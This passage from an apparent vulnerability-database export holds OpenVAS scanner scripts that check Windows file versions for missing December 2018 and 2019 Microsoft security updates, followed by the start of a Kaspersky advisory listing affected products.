script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdi32full.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3383\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Gdi32full.dll\",\n file_version:sysVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3383\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:05:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8634", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8540", "CVE-2018-8617", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8629", "CVE-2018-8639", "CVE-2018-8599", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471323", "modified": "2020-06-04T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814614", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814614", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471323)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471323)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814614\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8540\", \"CVE-2018-8599\",\n \"CVE-2018-8611\", \"CVE-2018-8617\", \"CVE-2018-8619\", \"CVE-2018-8625\",\n \"CVE-2018-8629\", \"CVE-2018-8631\", \"CVE-2018-8634\", \"CVE-2018-8639\",\n \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8595\", \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 10:39:09 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471323)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471323\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Microsoft text-to-speech fails to properly handle objects in the memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer VBScript execution policy does not properly restrict\n VBScript under specific conditions.\n\n - Scripting engine handles objects in memory in Internet Explorer.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Diagnostics Hub Standard Collector Service improperly impersonates\n certain file operations.\n\n - VBScript engine improperly handles objects in memory.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, gain elevated privileges, obtain sensitive\n information and take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471323\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.18062\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.18062\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1481", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1480", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "This host is missing a critical security\n update according to Microsoft KB4530734", "modified": "2020-07-17T00:00:00", "published": "2019-12-11T00:00:00", "id": "OPENVAS:1361412562310815737", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815737", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530734)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815737\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1474\", \"CVE-2019-1478\", \"CVE-2019-1480\", \"CVE-2019-1481\",\n \"CVE-2019-1484\", \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 14:30:14 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530734)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530734\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Win32k component fails to properly handle objects in memory.\n\n - win32k component improperly provides kernel information.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows improperly handles COM object creation.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n execute arbitrary code, elevate privileges, gain access to sensitive information,\n cause denial of service and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530734/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntdll.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_is_less(version:dllVer, test_version:\"6.1.7601.24540\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntdll.dll\",\n file_version:dllVer, vulnerable_range:\"Less than 6.1.7601.24540\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:29:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8634", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8612", "CVE-2018-8618", "CVE-2018-8540", "CVE-2018-8617", "CVE-2018-8624", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8629", "CVE-2018-8639", "CVE-2018-8626", "CVE-2018-8599", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8517", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471321", "modified": "2019-12-20T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814613", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471321)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471321)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814613\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8517\", \"CVE-2018-8540\",\n \"CVE-2018-8599\", \"CVE-2018-8611\", \"CVE-2018-8612\", \"CVE-2018-8617\",\n \"CVE-2018-8618\", \"CVE-2018-8619\", \"CVE-2018-8624\", \"CVE-2018-8625\",\n \"CVE-2018-8626\", \"CVE-2018-8629\", \"CVE-2018-8631\", \"CVE-2018-8634\",\n \"CVE-2018-8639\", \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8595\",\n \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 10:13:23 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471321)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471321\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Connected User Experiences and Telemetry Service fails to validate\n certain function values.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer VBScript execution policy does not properly restrict\n VBScript under specific conditions.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Scripting engine handles objects in memory in Internet Explorer.\n\n - VBScript engine improperly handles objects in memory.\n\n - Microsoft text-to-speech fails to properly handle objects in the memory.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Windows Domain Name System (DNS) servers fail to properly handle requests.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Diagnostics Hub Standard Collector Service improperly impersonates\n certain file operations.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, obtain sensitive information, deny\n dependent security feature functionality, gain elevated privileges, cause a\n denial of service and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471321\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2664\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2664\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:05:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8634", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8612", "CVE-2018-8618", "CVE-2018-8540", "CVE-2018-8617", "CVE-2018-8624", "CVE-2018-8583", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8629", "CVE-2018-8639", "CVE-2018-8599", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8517", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471327", "modified": "2020-06-04T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814612", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814612", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471327)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471327)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814612\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8517\", \"CVE-2018-8540\",\n \"CVE-2018-8599\", \"CVE-2018-8611\", \"CVE-2018-8612\", \"CVE-2018-8617\",\n \"CVE-2018-8618\", \"CVE-2018-8619\", \"CVE-2018-8624\", \"CVE-2018-8625\",\n \"CVE-2018-8629\", \"CVE-2018-8631\", \"CVE-2018-8634\", \"CVE-2018-8639\",\n \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8583\", \"CVE-2018-8595\",\n \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 10:03:10 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471327)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471327\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - Connected User Experiences and Telemetry Service fails to validate\n certain function values.\n\n - Internet Explorer VBScript execution policy does not properly\n restrict VBScript under specific conditions.\n\n - Windows GDI component improperly discloses the contents of its\n memory.\n\n - Scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - VBScript engine improperly handles objects in memory.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Microsoft text-to-speech fails to properly handle objects in the memory.\n\n - Diagnostics Hub Standard Collector Service improperly impersonates\n certain file operations.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, obtain sensitive information, deny dependent\n security feature functionality, gain elevated privileges and could take control\n of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471327\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1505\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1505\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8634", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8612", "CVE-2018-8618", "CVE-2018-8540", "CVE-2018-8617", "CVE-2018-8624", "CVE-2018-8583", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8629", "CVE-2018-8639", "CVE-2018-8626", "CVE-2018-8599", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8517", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471329", "modified": "2020-06-04T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814615", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471329)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471329)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814615\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8517\", \"CVE-2018-8540\",\n \"CVE-2018-8596\", \"CVE-2018-8599\", \"CVE-2018-8611\", \"CVE-2018-8612\",\n \"CVE-2018-8617\", \"CVE-2018-8618\", \"CVE-2018-8619\", \"CVE-2018-8624\",\n \"CVE-2018-8625\", \"CVE-2018-8626\", \"CVE-2018-8629\", \"CVE-2018-8631\",\n \"CVE-2018-8634\", \"CVE-2018-8639\", \"CVE-2018-8641\", \"CVE-2018-8643\",\n \"CVE-2018-8583\", \"CVE-2018-8595\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 10:50:45 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471329)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471329\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Connected User Experiences and Telemetry Service fails to validate\n certain function values.\n\n - Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - Internet Explorer VBScript execution policy does not properly restrict\n VBScript under specific conditions.\n\n - VBScript engine improperly handles objects in memory.\n\n - Windows Domain Name System (DNS) servers fail to properly handle\n requests.\n\n - Scripting engine handles objects in memory in Internet Explorer.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Diagnostics Hub Standard Collector Service improperly impersonates\n certain file operations.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Microsoft text-to-speech fails to properly handle objects in the memory.\n\n - Internet Explorer improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, deny dependent security feature\n functionality, obtain sensitive information, cause denial of service and could\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471329\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.845\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.845\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:57:18", "bulletinFamily": "info", "cvelist": ["CVE-2018-8621", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8622", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8639", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8625", "CVE-2018-8477"], "description": "### *Detect date*:\n12/11/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2012 \nInternet Explorer 11 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 